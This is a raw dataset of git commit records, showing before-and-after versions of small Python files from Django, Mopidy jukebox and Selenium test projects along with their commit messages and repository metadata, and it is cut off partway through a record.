# Override the default ICEkit settings to form project settings.
| <commit_before># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
<commit_msg>Use ICEkit settings by default again.<commit_after># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
|
46f3067650001454ed99351cc5569813a378dcec | mopidy_jukebox/frontend.py | mopidy_jukebox/frontend.py | import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
| import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| Delete votes when track is over. | Delete votes when track is over.
| Python | mit | qurben/mopidy-jukebox,qurben/mopidy-jukebox,qurben/mopidy-jukebox | import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
Delete votes when track is over. | import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| <commit_before>import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
<commit_msg>Delete votes when track is over.<commit_after> | import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
Delete votes when track is over.import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
| <commit_before>import pykka
from mopidy import core
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
pass
def track_playback_started(self, tl_track):
pass
<commit_msg>Delete votes when track is over.<commit_after>import pykka
from mopidy import core
from models import Vote
class JukeboxFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(JukeboxFrontend, self).__init__()
self.core = core
core.tracklist.set_consume(True)
def track_playback_ended(self, tl_track, time_position):
# Remove old votes
Vote.delete().where(Vote.track_uri == tl_track.track.uri).execute()
def track_playback_started(self, tl_track):
pass
|
afb1f8ed42c9b4f909f857cd960b526a0a31a901 | src/librement/debug/urls.py | src/librement/debug/urls.py | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
| from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| Enable the user panel properly. | Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org>
| Python | agpl-3.0 | rhertzog/librement,rhertzog/librement,rhertzog/librement | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org> | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| <commit_before>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
<commit_msg>Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org><commit_after> | from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
| <commit_before>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
<commit_msg>Enable the user panel properly.
Signed-off-by: Chris Lamb <29e6d179a8d73471df7861382db6dd7e64138033@debian.org><commit_after>from django.conf.urls.defaults import patterns, url, include
from django.conf import settings
urlpatterns = patterns('librement.debug.views',
)
if settings.DEBUG:
urlpatterns += patterns('django.views.static',
url(r'^media/(?P<path>.*)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
(r'^(?P<path>favicon\.ico|robots\.txt)$', 'serve',
{'document_root': settings.STATIC_MEDIA_ROOT}),
)
urlpatterns += patterns('librement.debug.views',
url(r'^(?P<code>404|500)$', 'error'),
)
urlpatterns += patterns('',
url(r'', include('debug_toolbar_user_panel.urls')),
)
|
2336a72c878a58ef8a3a1f47f6ecf9ee9574feca | project_name/project_name/urls.py | project_name/project_name/urls.py | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | Update url pattern syntax for django 1.10 | Update url pattern syntax for django 1.10
| Python | mit | tom-henderson/django-template,tom-henderson/django-template | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)Update url pattern syntax for django 1.10 | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | <commit_before>from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)<commit_msg>Update url pattern syntax for django 1.10<commit_after> | from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)Update url pattern syntax for django 1.10from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | <commit_before>from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)<commit_msg>Update url pattern syntax for django 1.10<commit_after>from django.conf.urls import include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from django.contrib import admin
from django.conf import settings
import views
admin.autodiscover()
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='{{project_name}}/base.html')),
url(r'^login/$', 'django.contrib.auth.views.login'),
url(r'^logout/$', views.log_out, name='log_out'),
url(r'^admin/', include(admin.site.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) |
7ec478f769350485b6c468308f0785e1d45b0fa8 | testmodel/webapp/selenium/test/templates-test.py | testmodel/webapp/selenium/test/templates-test.py | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| Use the same app as deployed by the setup script | Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c | Python | lgpl-2.1 | julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine,julie-sullivan/phytomine | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| <commit_before>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
<commit_msg>Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c<commit_after> | import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275cimport unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
| <commit_before>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-test/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
<commit_msg>Use the same app as deployed by the setup script
Former-commit-id: 8fa2a956df16ece64642433626314625326d275c<commit_after>import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class TemplateTestCase(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('http://localhost:8080/intermine-demo/templates.do')
def elem(self, selector):
return self.browser.find_element_by_css_selector(selector)
def testTemplatesPageTitle(self):
self.assertIn('Template queries', self.browser.title)
def testFindTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
self.assertIsNotNone(template_link, "Expected to find link")
self.assertTrue(template_link.is_displayed(), "Expected link to be visible to user")
def testRunTemplate(self):
template_link = self.browser.find_element_by_link_text("Search for Managers")
template_link.click()
self.assertIn('Search for Managers', self.browser.title)
button = self.elem("#smallGreen.button input")
self.assertIsNotNone(button, "Expected to find button to run template")
button.click()
summary = self.elem(".im-table-summary")
self.assertIsNotNone(button, "Expected to find a summary of the template results")
self.assertEqual("Showing 1 to 2 of 2 rows", summary.text)
|
470752a778476d27fd5f13445b8cd8a79b722591 | cfgov/cfgov/settings/local.py | cfgov/cfgov/settings/local.py | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| Allow init_command to be set by env | Allow init_command to be set by env
| Python | cc0-1.0 | kave/cfgov-refresh,kave/cfgov-refresh,kave/cfgov-refresh,kave/cfgov-refresh | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
Allow init_command to be set by env | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': os.environ.get('STORAGE_ENGINE', 'SET storage_engine=MYISAM') },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
| <commit_before>from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
'ENGINE': MYSQL_ENGINE,
'NAME': os.environ.get('MYSQL_NAME'),
'USER': os.environ.get('MYSQL_USER'),
'PASSWORD': os.environ.get('MYSQL_PW', ''),
'HOST': os.environ.get('MYSQL_HOST', ''), # empty string == localhost
'PORT': os.environ.get('MYSQL_PORT', ''), # empty string == default
'OPTIONS': {'init_command': 'SET storage_engine=MYISAM', },
},
}
STATIC_ROOT = REPOSITORY_ROOT.child('collectstatic')
ALLOW_ADMIN_URL = DEBUG or os.environ.get('ALLOW_ADMIN_URL', False)
<commit_msg>Allow init_command to be set by env<commit_after> | from .base import *
DEBUG = True
INSTALLED_APPS += ('wagtail.contrib.wagtailstyleguide',)
DATABASES = {
'default': {
